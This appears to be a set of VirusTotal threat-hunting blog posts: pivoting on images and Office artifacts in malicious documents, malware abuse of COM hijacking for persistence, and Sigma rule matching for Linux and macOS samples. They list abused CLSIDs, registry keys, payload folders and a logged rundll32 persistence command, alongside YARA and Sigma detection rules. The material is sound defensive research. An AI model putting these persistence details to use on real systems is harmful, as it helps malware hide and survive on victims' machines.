Figure 20 was provided by our sandbox. In the “relations” tab, we can see the BMP image as a dropped file:

Figure 21: BMP file generated by the sandbox that can be used for pivoting
The BMP file itself also shows relations, in particular up to 6 PDF files in the “execution parents” section. In other words, there are other PDFs that look exactly the same as the initial one.
Typically, many actors engaged in financial crime activities utilize widely spread PDF files to deceive their victims, making this approach highly valuable. Another interesting example we found involves phishing activities targeting a Russian bank called “Tinkoff Bank.”
The PDF files urge victims to accept an invitation from this bank to participate in a project.

Figure 22: The content of a PDF file used by cybercrime actors
Applying the same approach we identified 20 files with identical content, most of them classified as malicious by AV engines.

Figure 23: BMP file generated by the sandbox that can be used for pivoting, in this case having other 20 PDF with the same image
There are some limitations to this approach. For instance, the PDF file might be slightly modified (font size, some letter/word, color, …) which would generate a completely different hash value for the thumbnail we use to pivot.

Images dropped by Acrobat Reader

Just like the BMP files generated by Acrobat Reader, there are other interesting files that might be dropped during sandbox detonation. These artifacts can be useful on some occasions.
The first example is a JavaScript file dropped in another PDF attributed to Blind Eagle.

Figure 24: BMP file generated by the sandbox that can be used for pivoting, another example of Blind Eagle threat actor
The dropped JavaScript file’s name during the PDF execution was “Chrome Cache Entry: 566” indicating that this file was likely generated by opening an URL through Chrome, possibly triggered by a sandbox click on a link within the PDF. Examining the file’s contents, we observe some strings and variables in Spanish.

Figure 25: Artifact generated by the sandbox via Google Chrome when connecting to a domain
The strings “registerResourceDictionary”, “sampleCustomStringId”, “rf_RefinementTitle_ManagedPropertyName” are related to Microsoft SharePoint as we were able to confirm. These files were probably generated after visiting sites that have Microsoft Sharepoint functionalities. We found that all the PDFs containing this artifact dropped by Google Chrome came from a website belonging to the Government of Colombia.

Figure 26: Flow of artifact generation related to Google Chrome that can be used for pivoting in VirusTotal

Email files

Many threat actors incorporate images in their emails, such as company logos, to deceive victims. We used this to identify several mailing campaigns where the same footer was used.

Campaign impersonating universities

On November 13, 2023, we details about a new campaign impersonating universities, primarily located in Latin America. By leveraging the presence of social network logos in the footer, we were able to find more universities in different continents targeted by the same attacker.

Figure 27: Email impersonating a university that contains multiple images
Figure 27 shows several images, including the University of Chile’s logo and building, as well as images related to social networks like YouTube, Facebook, and Twitter.
Pivoting through the images related to the University of Chile doesn’t yield good results, as it’s too specific. However, if we pivot through the images of the social media footer, represented as email attachments, we can observe multiple files using the same logo.

Figure 28: Using the images from the email footer to pivot and identify new emails
Just by analyzing one of the social media logos, we saw 33 email parents, all of them related to the same campaign.

Figure 29: Other emails identified through image pivoting techniques

Campaigns impersonating companies

Another usual case is adding a company logo in the email signatures to enhance credibility. Delivery companies, banks, and suppliers are some of the most observed images during our research.
For example, this email utilizes the corporate image of China Anhui Technology Import and Export Co Ltd in the footer.

Figure 30: Email impersonating a Chinese organization using the company logo in the footer
Pivoting through the image we found 20 emails using the same logo.

Figure 31: Other emails identified through image pivoting techniques

Wrapping up

We can potentially trace malicious actors by examining artifacts linked to the initial spreading documents, and in the case of images, AI can help us automate potential victim identification and other hunting aspects.
In order to make this even easier, we are planning to incorporate a new bundled_files field into the IOCs JSON structure, which basically will help to create livehunt rules. In the meantime you can use vt_behaviour_files_dropped.sha256 for those scenarios where the files are dropped.
In certain situations, the styles.xml and [Content_Types].xml files within office documents can provide valuable clues for identifying and tracking the same threat actor. The method presented here offers an alternative to traditional hunting or pivoting techniques, serving as a valuable addition to a team’s hunting activities.
We hope you found this research interesting and useful, and as always we are happy to hear your feedback.
Happy hunting!

APPENDIX

[Content_types].xml shared between threat actors

[Content_Type].xml
sha256

Shared
by

3d8578fd41d766740a1f1ddef972a081436a2d70ab1e9552a861e58d8bbf5321

APT33,
APT32

4ea40d34cfcaf69aa35b405c575c7b87e35c72246f04d2d0c5f381bc50fc8b3d

APT29,
APT28

4f7fa7433484b4e655d185719613e2f98d017590146d15eedc1aa1d967636b3a

FIN7,
Gamaredon, APT28, APT32

529739886f6402a9cd5a8064ece73eef19c597ef35c0bc8d09390e8b4de9041b

FIN7,
APT33, TA505, Mustang Panda

688dca40507fb96630f3df80442266a0354e7c24b7df86be3ea57069b25d12c6

Gamaredon,
APT33

6f1ac5f0ebfb7e97d3dc4100e88eaab10016a5cac75e1251781f2ea12477af51

Gamaredon,
Hazy Tiger, APT33,

7796c382cd4c7c4ae3bcf2eed4091fbb20a2563ca88f2aecadb950ad9cf661f8

Razor
Tiger, APT28, UAC-0099

b4fa7f3faa0510e4d969219bceec2a90e8a48ff28e060db3cdd37ce935c3779c

Razor
Tiger, SideCopy

dfa90f373b8fd8147ee3e4bfe1ee059e536cc1b068f7ec140c3fc0e6554f331a

Gamaredon,
APT37, Mustang Panda, APT28, UAC-0099, SideCopy

fe98b3bcf96f9c396eb9193f0f9484ef01d3017257300cc76098854b1f103b69

FIN7,
Hazy Tiger

ff5a5ba3730a8d2ec0cbad39e5edf4ad502107bd0ef8a5347f29262b3dfe8a43

Mustang
Panda, APT32

styles.xml shared between threat actors

Styles.xml
sha256

Shared
by

13ed55637980452662cb6838a2931a5e54fbed5881bcbae368b3d189d3a01930

APT28,
UAC-0099, Razor Tiger

2de1fc9c48c4b0190361c49cdb053fd39cf81e32f12c82d08f88aec34358257f

Hazy
Tiger, Gamaredon, APT33

59df7787c7cf5408481ae149660858d3af765a0c2cd63d6309b151380f92adb2

TA505,
Gamaredon

8f590f608f0719404a1731bb70a6ce2db420fd61e5a387d5b3091d47c7e21ac9

APT28,
FIN7, Razor Tiger, APT32, APT33

de392cd4bf1d650a9cf8c6d24e05e0605bf4eaf1518710f0307d8aceb9e5496c

Hazy
Tiger, FIN7

e16f84c5fd1df6af1a1f2049f7862f4ea460765863476afb17e78edee772d35b

APT32,
SideCopy, Mustang Panda, Razor Tiger

Continue reading Tracking Threat Actors Using Images and Artifacts

COM Objects Hijacking

The COM Hijacking technique is often utilized by threat actors and various malware families to achieve both persistence and privilege escalation in target systems. It relies on manipulating Component Object Model (COM), exploiting the core architecture of Windows that enables communication between software components, by adding a new value on a specific registry key related to the COM object itself.
We studied the usage of this technique by different malware samples to pinpoint the most exploited COM objects in 2023.

Abused COM Objects

We identified the most abused COM objects by samples using MITRE’s T1546.015 technique during sandbox execution. In addition to the most abused ones, we will also highlight other abused COM objects that we found interesting.
The chart below shows the distribution of how many samples abused different COM objects for persistence:

You can find the most used COM / CLSIDs listed in the Appendix.

Berbew

One of the main malware families we have observed abusing COM for persistence is Padodor/Berbew. This Trojan primarily focuses on stealing credentials and exfiltrating them to remote hosts controlled by attackers. The main COM objects abused by this family are as follows:
  • {79ECA078-17FF-726B-E811-213280E5C831}

  • {79FEACFF-FFCE-815E-A900-316290B5B738}

  • {79FAA099-1BAE-816E-D711-115290CEE717}

The corresponding registry entries point to the malicious DLL. However, multiple samples of this family use a second registry key for persistence, which points to this previous CLSID we described, as in the following example :

In this case, the registry key …CLSID\{79ECA078-17FF-726B-E811-213280E5C831}\InProcServer32\(Default) points to the malicious DLL C:\Windows\SysWow64\Iimgdcia.dll. A second registry entry …Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger points to the previous CLSID {79ECA078-17FF-726B-E811-213280E5C831} which loads the malicious DLL.
The ShellServiceObjectDelayLoad registry entry (part of ShellServiceObjectDelayLoad), combined with the Web Event Logger subkey used here by Berbew, has frequently been utilized to initiate the loading of the genuine webcheck.dll. This DLL was tasked with monitoring websites within the Internet Explorer application.
The previously utilized CLSID by WebCheck registry key was {E6FB5E20-DE35-11CF-9C87-00AA005127ED} However, in certain instances today the CLSID {08165EA0-E946-11CF-9C87-00AA005127ED} is used. Both are responsible for loading the webcheck.dll DLL and are abused by malware samples.

RATs

The CLSID {89565275-A714-4a43-912E-978B935EDCCC} seems to be extensively used by various RATs . This CLSID has primarily been associated with families like RemcosRAT and AsyncRAT in our observations. However, we’ve also encountered instances where BitRAT samples have used it. Researchers at Cisco Talos found this CLSID activity associated with the SugarGh0st RAT malware.
In the majority of cases, the DLL used for persistence with this CLSID is dynwrapx.dll. This DLL was found in the wild in a GitHub repository, currently unavailable, however the DLL originates from a project named DynamicWrapperX (first seen in VirusTotal in 2010). It executes shellcode to inject the RAT into a process.
A similar case is CLSID {26037A0E-7CBD-4FFF-9C63-56F2D0770214}. The associated DLL for persistence is dbggame.dll. First uploaded to VirusTotal in 2012, this DLL is deployed by various types of malware, including ransomware such as XiaoBa.

RATs w/ vulnerabilities

To finish with RATs that use this technique, from late December 2023 to February 2024, there were various incidents linked to the CVE-2024-21412 vulnerability uncovered by the Trend Micro Zero Day Initiative team (ZDI). During these events, active campaigns were distributing the Darkme RAT. Throughout the infection process, a primary goal was to evade Microsoft Defender SmartScreen and introduce victims to the DarkMe malware.
The TrendMicro analysis highlights that the Darkme RAT sample utilizes the CLSID {74A94F46-4FC5-4426-857B-FCE9D9286279} to carry out the final load of the RAT. Yet, we’ve noted the utilization of other CLSIDs for persistence, including {D4D4D7B7-1774-4FE5-ABA8-4CC0B99452B4} in this sample.
Furthermore, to guarantee the DLL’s execution, they generate a registry key employing Autorun keys. This key’s objective is to initiate the CLSID using rundll32.exe and /sta parameter, which is used to load a COM object, in this case, the previous malicious COM object created.
EventID:13 
EventType:SetValue
Details:%windir%\SysWOW64\rundll32.exe /sta {D4D4D7B7-1774-4FE5-ABA8-4CC0B99452B4} "USB_Module"
TargetObject:HKU\S-1-5-21-575823232-3065301323-1442773979-1000\Software\Microsoft\Windows\CurrentVersion\Run\RunDllModule

Why use one when you can use many?

Some samples (like this Sality one) use multiple CLSIDs:
  • {EBEB87A6-E151-4054-AB45-A6E094C5334B}

  • {57477331-126E-4FC8-B430-1C6143484AA9}

  • {241D7F03-9232-4024-8373-149860BE27C0}

  • {C07DB6A3-34FC-4084-BE2E-76BB9203B049}

The sample drops two different DLLs during execution, three of the registry keys point to one of them, the remaining one to the other. The sample also turns off the Windows firewall and UAC to carry out additional actions while infecting the system.

The Allaple worm family deploys multiple COM objects pointing to the malicious DLL during execution, like in this example:

Adware

Citrio, an adware web browser designed by Catalina Group, uses in its more recent versions a COM object for persistence with CLSID {F4CBF20B-F634-4095-B64A-2EBCDD9E560E}. It drops several harmful DLLs, one masquerades as Google Update (goopdate.dll), also observed as psuser.dll, that possesses the capability to establish services on the system along using a COM object for persistence.

Common folders used to store the payloads

Most malicious DLLs we saw so far are typically stored in the C:\Users\<user>\AppData\Roaming\ directory. It’s also common to create subfolders within this directory, the most frequently found include:
  • \qmacro

  • \mymacro

  • \MacroCommerce

  • \Plugin

  • \Microsoft

In addition to these, we also found the following folders being frequently used to hide malicious DLLs:
  • The C:\Windows\SysWow64 is a folder found in 64-bit versions of Windows, containing legitimate 32-bit system files and
    libraries, and is oftenly used to conceal malicious DLLs. Its prevalence makes it an attractive
    hiding place, complicating detection efforts. However, permissions are required to create files in
    it.

  • The
    C:\Program Files (x86)
    folder is another legitimate directory used to store malicious COM hijacking payloads. Similar to
    \AppData\Roaming, in this case we have observed that the malicious DLLs are stored under specific
    subfolders, such as “\Google”, “\Mozilla Firefox”, “\Microsoft”, “\Common Files” or “\Internet
    Download Manager”.

  • C:\Users\<user>\AppData\Local
    is another folder used for storing these payloads, including the “\Temp”, “\Microsoft” and “\Google”
    subfolders.

Detection

In order to detect unusual modifications to registry COM objects, there are a couple of crowdsourced Sigma rules to identify this behavior.

These rules will detect uncommon registry modifications related to COM objects. You can use the following queries to retrieve samples triggered by the previous rules, respectively: VTI query for sigma1 and VTI query for sigma2.
You can also identify this behavior using Livehunt rules that target the creation of registry keys utilized for this purpose, for instance with the vt.behaviour.registry_keys_set modifier.
import "vt"

rule CLSID_COM_Hijacking:  {
  meta:
    target_entity = "file"
    hash = "a19472bd5dd89a6bd725c94c89469f12cdbfee3b0f19035a07374a005b57b5e0"
    author = "@Joseliyo_Jstnk"
    mitre_technique = "T1546.015"
    mitre_tactic = "TA0003"

  condition:
    vt.metadata.new_file and vt.metadata.analysis_stats.malicious >= 5 and 
    for any vt_behaviour_registry_keys_set in vt.behaviour.registry_keys_set: (
      vt_behaviour_registry_keys_set.key matches /\\CLSID\\{[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}\}\\InProcServer32\\\(Default\)/
    )  
}
The rule above might generate some noise, so we suggest considering polishing it by excluding certain common families like Berbew, which as mentioned, heavily relies on this technique:
and not 
    (
        for any engine, signature in vt.metadata.signatures : (  
        signature icontains "berbew"  
        )  
    )
You can also use the paths listed in Appendix to identify suspicious samples using them.
A final idea is including interesting existing Sigma rules into our Livehunt. Given that these rules already cover the targeted registry keys, we don’t need to use vt.behaviour.registry_keys_set in our condition.
import "vt"

rule CLSID_COM_Hijacking:  {
  meta:
    target_entity = "file"
    hash = "a19472bd5dd89a6bd725c94c89469f12cdbfee3b0f19035a07374a005b57b5e0"
    author = "@Joseliyo_Jstnk"
    sigma_authors = "Maxime Thiebaut (@0xThiebaut), oscd.community, Cédric Hien"
    mitre_technique = "T1546.015"
    mitre_tactic = "TA0003"

  condition:
    vt.metadata.new_file and vt.metadata.analysis_stats.malicious >= 5 and 
    for any vt_behaviour_sigma_analysis_results in vt.behaviour.sigma_analysis_results: (
      vt_behaviour_sigma_analysis_results.rule_id == "7f5d257abc981b5eddb52d4a9a02fb66201226935cf3d39177c8a81c3a3e8dd4"
    )
}

Wrapping up

The T1546.015 – Event Triggered Execution: Component Object Model Hijacking is just one of several techniques employed for persistence. Leveraging COM objects for this task is frequently straightforward for threat actors. The analysis of how malware abuses this technique helps us get a better understanding in how to identify different families and develop protection methods. Although the technique is not the most popular for persistence (that would be T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder), it is widely abused by many malware families.

Identifying some of the most abused CLSIDs can help us generate detection rules that identify possible malware abuses in our infrastructure. It can also serve as a good guide for prevalence in order to detect any anomalies for new suspicious activity.
The use of VirusTotal sandbox reports provides a very powerful tool to translate TTPs into actionable queries and monitoring. In this example we used it to better understand how attackers use COM objects, but could be used for any techniques employed by different threat actors.
We hope you join our fan club of Sigma and VirusTotal, and as always we are happy to hear your feedback.

APPENDIX

Abused CLSIDs

Next, you’ll find a list of the main CLSIDs described in the blog, along with a chart to show which ones were used the most.

CLSID
– COM Objects

79FAA099-1BAE-816E-D711-115290CEE717

EBEB87A6-E151-4054-AB45-A6E094C5334B

241D7F03-9232-4024-8373-149860BE27C0

C07DB6A3-34FC-4084-BE2E-76BB9203B049

79ECA078-17FF-726B-E811-213280E5C831

22C6C651-F6EA-46BE-BC83-54E83314C67F

F4CBF20B-F634-4095-B64A-2EBCDD9E560E

57477331-126E-4FC8-B430-1C6143484AA9

C73F6F30-97A0-4AD1-A08F-540D4E9BC7B9

89565275-A714-4a43-912E-978B935EDCCC

26037A0E-7CBD-4FFF-9C63-56F2D0770214

16426152-126E-4FC8-B430-1C6143484AA9

33414471-126E-4FC8-B430-1C6143484AA9

23716116-126E-4FC8-B430-1C6143484AA9

D4D4D7B7-1774-4FE5-ABA8-4CC0B99452B4

79FEACFF-FFCE-815E-A900-316290B5B738

74A94F46-4FC5-4426-857B-FCE9D9286279

Common paths

Below you will find a list with some of the most common paths used during the creation of the COM objects for persistence. The table contains the ‘parent’ paths as well, while the chart includes only the ‘subpaths’.

Common
paths used during COM object persistence

C:\Users\<user>\AppData\Roaming

C:\Users\<user>\AppData\Roaming\qmacro

C:\Users\<user>\AppData\Roaming\mymacro

C:\Users\<user>\AppData\Roaming\MacroCommerce

C:\Users\<user>\AppData\Roaming\Plugin

C:\Users\<user>\AppData\Roaming\Microsoft

C:\Windows\SysWow64

C:\Program
Files (x86)

C:\Program
Files (x86)\Google

C:\Program
Files (x86)\Mozilla Firefox

C:\Program
Files (x86)\Microsoft

C:\Program
Files (x86)\Common Files

C:\Program
Files (x86)\Internet Download Manager

C:\Users\<user>\AppData\Local

C:\Users\<user>\AppData\Local\Temp

C:\Users\<user>\AppData\Local\Microsoft

C:\Users\<user>\AppData\Local\Google

C:\Windows\Temp

Continue reading COM Objects Hijacking

Sigma rules for Linux and MacOS

TLDR: VT Crowdsourced Sigma rules will now also match suspicious activity for macOS and Linux binaries, in addition to Windows.
We recently discussed how to maximize the value of Sigma rules by easily converting them to YARA Livehunts. Unfortunately, at that time Sigma rules were only matched against Windows binaries.
Since then, our engineering team worked hard to provide a better experience to Sigma lovers, increasing Crowdsourced Sigma rules value by extending matches to macOS and Linux samples.

Welcome macOS and Linux

Although we are still working to implement Sysmon in our Linux and macOS sandboxes, we implemented new features that allow Sigma rule matching by extracting samples’ runtime behavior.
For example, a process created in our sandbox that ends in “/crontab” and contains the “-l” parameter in the command line would match the following Sigma rule:

logsource:

  product: linux

  category: process_creation

detection:

  selection:

    Image|endswith: ‘/crontab’

    CommandLine|contains: ‘ -l’

  condition: selection

We have mapped all the fields used by Sigma rules with the information offered by our sandboxes, which allowed us to map rules for image_load, process_creation and registry_set, among others.
This approach has limitations. However, about 54% of Crowdsourced Sigma rules for Linux and 96% for macOS are related to process creation, meaning we already have enough information to match all these with our sandboxes’ output. The same happens for rules based on file creation.
Let’s look at some examples!

Linux, MacOS and Windows examples

The following shell script sample matches 11 Crowdsourced Sigma Rule matches.

For every rule, it is possible to check what triggered the match by clicking on “View matches”. In the case of Windows binaries, it would show what Sysmon event matched the behavior described in the Sigma rule, as we can see below:

In the case of the shell script mentioned above, it shows the values that are relevant to the logic of the rule as you can see in the following image:

Interestingly, Sigma rules intended for Linux also produce results in macOS environments, and vice versa. In this case, the shell script can be interpreted by both operating systems. Indeed, one of the matching rules for the sample called Indicator Removal on Host – Clear Mac System Logs was specifically created for macOS:

while a second matching rule, Commands to Clear or Remove the Syslog , was created for Linux:

To get more examples of samples with Sigma rules that match sandboxes’ output instead of Sysmon, you can use the following queries:
(have:sigma) and not have:evtx type:mac
(have:sigma) and not have:evtx type:linux
A second interesting example is a dmg matching 8 Sigma rules, 5 of them originally created for Linux OS under the “process_creation” category and 2 rules created for macOS. The last match… is a Sigma rule created for Windows samples!

The new feature matching Sigma rules with Linux and macOS samples helped us identify some rules that are maybe too generic, which is not necessarily a problem as long as this is the intended behavior.
In this case, the Usage Of Web Request Commands And Cmdlets rule was originally created to detect web request using Windows’ command line:

The rule seems a bit too generic since it only checks for a few strings in the command line, although it can be highly effective for generic detection of suspicious behavior.
To understand why our Macintosh Disk Image sample triggered a detection for this rule, we checked the matches:

As we can see, the use of the string “curl” in the command line was enough to match this sample.
This sigma rule had about 9k hits last year only, with more than 300 of the files being Linux or macOS samples. You can obtain the full list using the following query:
sigma_rule:f92451c8957e89bb4e61e68433faeb8d7c1461c3b90d06b3403c8f3d87c728b8 and (type:linux or type:mac)

Creating Livehunt rules from Sysmon EVTX outputs

So far we have mainly focused on samples that do not have Sysmon (EVTX) logs. Now let’s see how it is possible to create a Livehunt rule based on Sysmon logs. For this, we are going to use the “structure” functionality provided in the Livehunt YARA editor, as we explain in this post.
The sample we will use in this example is associated with CobaltStrike and matches multiple Sigma rules that identify certain behaviors. It is important to note that for every Sigma match, we will see in the file “structure” the context that matched but not the full EVTX logs. These can be downloaded from the sample’s VT report behavior section under “Download Artifacts” or using our API (available for public and privately scanned files).
The following image shows the matching raw EVTX generated by our sample:

From the sample’s JSON Structure, Sigma_analysis_results is an array that contains objects with all the relevant information related to the matching Sigma rules, including details about the rule itself and EVTX logs. From the previous image, the first highlighted section is related to process creation and the second one is a registry event (value set).
As explained in our post, by just clicking on the fields that you are interested in you can start building your Livehunt rule, and adjust values accordingly. In this case, our rule will identify files creating registry keys under \\CurrentVersion\\RunOnce\\ with a .bat or .vbs extension:

import
“vt”

rule
sigma_example_registry_keys
{

  meta:

    target_entity
=
“file”

  condition:

    for
any
vt_behaviour_sigma_analysis_results
in
vt.behaviour.sigma_analysis_results:
(

      for
any
vt_behaviour_sigma_analysis_results_match_context
in
vt_behaviour_sigma_analysis_results.match_context:
(

        vt_behaviour_sigma_analysis_results_match_context.values[“TargetObject”]
icontains
“\\CurrentVersion\\RunOnce\\”
and

        (vt_behaviour_sigma_analysis_results_match_context.values[“Details”]
endswith
“.vbs”
or
vt_behaviour_sigma_analysis_results_match_context.values
[“Details”]
endswith
“.bat”)

      )

    )

}

Running this YARA using a Retrohunt finds multiple files:
daef729493b9061e7048b4df10b71fdba2e11d9147512f48463994a88c834a30
141e87e62c110b86cf7b01a2def60faab6365f6391eb0d4a7cbad8d480dd4706
814b2cab7c5a12ec18f345eb743857e74f5be45c35642dc01330e7a0def6269a
31b0e9b188fe944d58867bbfc827d77c7711c3a690168a417377fe6bf1544408
dd6051509ed8cf3d059b538fa8878f87423c51b297b49a12144d3d2923c89cce
647323f0245da631cef57d9ca1e3327c3242fe1cbbf6582c4d187e9f5fbfb678
40a90dd3b2132a299f725e91a5d0127013b21af24074afb944d8bc5735c1bd53
b44c6d2dd8ad93cecd795cecde83081292ee9949d65b2e98d4a2a3c8a97bd936
710b0cca7e7c17a3dd2a309f5ca417b76429feac1ab5fb60f5502995ebbd1515
50c098119ce41771e7a3b8230a7aa61ebea925e8eda46c33f0dd42b8950b92fe
Here you can see some interesting matches:

The next rule focuses on file creation events related to Sysmon (EVID 11) under the “C:\Windows\System32” directory, with a “.dll” extension and having any “cve” tag (flagging potential CVE exploitation). Remember we can always include any additional details related to the samples we want to hunt, such as positives, metadata, tags, engines, … in addition to EVTX fields:

import
“vt”

rule
sigma_rule_evtx_cve
{

  meta:

    target_entity
=
“file”

  condition:

    for
any
vt_behaviour_sigma_analysis_results
in
vt.behaviour.sigma_analysis_results:
(

      for
any
vt_behaviour_sigma_analysis_results_match_context
in
vt_behaviour_sigma_analysis_results.match_context:
(

        vt_behaviour_sigma_analysis_results_match_context.values[“TargetFilename”]
startswith
“C:\\Windows\\System32\\”
and

        vt_behaviour_sigma_analysis_results_match_context.values[“TargetFilename”]
endswith
“.dll”
and

        for
any
vt_metadata_tags
in
vt.metadata.tags:
(

        vt_metadata_tags
icontains
“cve-“

        )

      )

    )

}

Sysmon EVTX fields – overlaps

Some of the details found in Sysmon EVTX fields (found in the VT JSON samples’ structure) can be redundant with details provided in other more traditional fields that you use for your Livehunt rules through the YARA VT module.
For example, instead of:
vt_behaviour_sigma_analysis_results_match_context.values[“TargetFilename”] from vt.behaviour.sigma_analysis_results
you could use: vt.behaviour.files_written to identify file creation events.
When that’s the case, we recommend using traditional fields found in VT samples’ structure for the following reasons:
  • Sysmon information is fully stored/indexed only the part matching the Sigma rule, which will limit any YARA hunting.
  • We mapped most Sysmon fields into YARA VT module for simplicity.
  • Linux and MacOS samples do not have any Sysmon information related to Sigma rules. Similar details about the match can be found under the “behaviour” JSON structure entry.
The new Sysmon-like details offered in the file “structure” also make VT an excellent platform for researchers and Sigma rule creators, allowing them to leverage this information without the need to create their own lab.
The following table helps mapping VT Intelligence queries, YARA VT module fields, Sigma Categories, and Sigma fields:

VT
Intelligence

YARA
VT module field

Sigma
Category

Sigma
Field

behavior_created_processes

vt.behaviour.processes_created

process_creation

Image

CommandLine

ParentCommandLine

ParentImage

OriginalFileName

behavior_files

vt.behaviour.files_attribute_changed

vt.behaviour.files_deleted

vt.behaviour.files_opened

vt.behaviour.files_copied

vt.behaviour.files_copied[x].destination

vt.behaviour.files_copied[x].source

vt.behaviour.files_written

vt.behaviour.files_dropped

vt.behaviour.files_dropped[x].path

vt.behaviour.files_dropped[x].sha256

vt.behaviour.files_dropped[x].type

file_access

file_change

file_delete

file_rename

file_event

TargetFilename

behavior_injected_processes

vt.behaviour.processes_injected

process_access

create_remote_thread

process_creation

CallTrace

GrantedAccess

SourceImage

TargetImage

StartModule

StartFunction

TargetImage

SourceImage

behavior_processes

vt.behaviour.processes_terminated

vt.behaviour.processes_killed

vt.behaviour.processes_created

vt.behaviour.command_executions

vt.behaviour.processes_injected

process_access

create_remote_thread

process_creation

CallTrace

GrantedAccess

SourceImage

TargetImage

StartModule

StartFunction

TargetImage

SourceImage

Image

CommandLine

ParentCommandLine

ParentImage

OriginalFileName

behavior_registry

vt.behaviour.registry_keys_deleted

vt.behaviour.registry_keys_opened

vt.behaviour.registry_keys_set

vt.behaviour.registry_keys_set[x].key

vt.behaviour.registry_keys_set[x].value

registry_add

registry_delete

registry_event

registry_rename

registry_set

EventType

TargetObject

Details

behavior_services

vt.behaviour.services_bound

vt.behaviour.services_created

vt.behaviour.services_opened

vt.behaviour.services_started

vt.behaviour.services_stopped

vt.behaviour.services_deleted

registry_set

process_creation

Image

CommandLine

ParentCommandLine

ParentImage

EventType

TargetObject

Details

behavior_network

vt.behaviour.dns_lookups

vt.behaviour.dns_lookups[x].hostname

vt.behaviour.dns_lookups[x].resolved_ips

vt.behaviour.hosts_file

vt.behaviour.ip_traffic

vt.behaviour.ip_traffic[x].destination_ip

vt.behaviour.ip_traffic[x].destination_port

vt.behaviour.ip_traffic[x].transport_layer_protocol

vt.behaviour.http_conversations

vt.behaviour.http_conversations[x].url

vt.behaviour.http_conversations[x].request_method

vt.behaviour.http_conversations[x].request_headers

vt.behaviour.http_conversations[x].response_headers

vt.behaviour.http_conversations[x].response_status_code

vt.behaviour.http_conversations[x].response_body_filetype

vt.behaviour.smtp_conversations[x].hostname

vt.behaviour.smtp_conversations[x].destination_ip

vt.behaviour.smtp_conversations[x].destination_port

vt.behaviour.smtp_conversations[x].smtp_from

vt.behaviour.smtp_conversations[x].smtp_to

vt.behaviour.smtp_conversations[x].message_from

vt.behaviour.smtp_conversations[x].message_to

vt.behaviour.smtp_conversations[x].message_cc

vt.behaviour.smtp_conversations[x].message_bcc

vt.behaviour.smtp_conversations[x].timestamp

vt.behaviour.smtp_conversations[x].subject

vt.behaviour.smtp_conversations[x].html_body

vt.behaviour.smtp_conversations[x].txt_body

vt.behaviour.smtp_conversations[x].x_mailer

vt.behaviour.tls

network_connection

DestinationHostname

DestinationIp

DestinationIsIpv6

DestinationPort

DestinationPortName

SourceIp

SourceIsIpv6

SourcePort

SourcePortName

behavior (too generic)

vt.behaviour.modules_loaded

image_load

ImageLoaded

Image

OriginalFileName

Wrapping up

At VirusTotal, we believe that the Sigma language is a valuable tool for the community to share information about samples’ behavior. Our objective is to make its use on VT as simple as possible. Our addition of MacOS and Linux is just the start of what we are working on, as we aim to add Sysmon for Linux to obtain more robust results, including the ability to download full generated logs.
Remember that here you have a list of all the Crowdsourced Sigma rules that are currently deployed in VirusTotal and that you can use for threat hunting.
We hope you join our fan club of Sigma and VirusTotal, and as always we are happy to hear your feedback.
Happy Hunting!

Continue reading Sigma rules for Linux and MacOS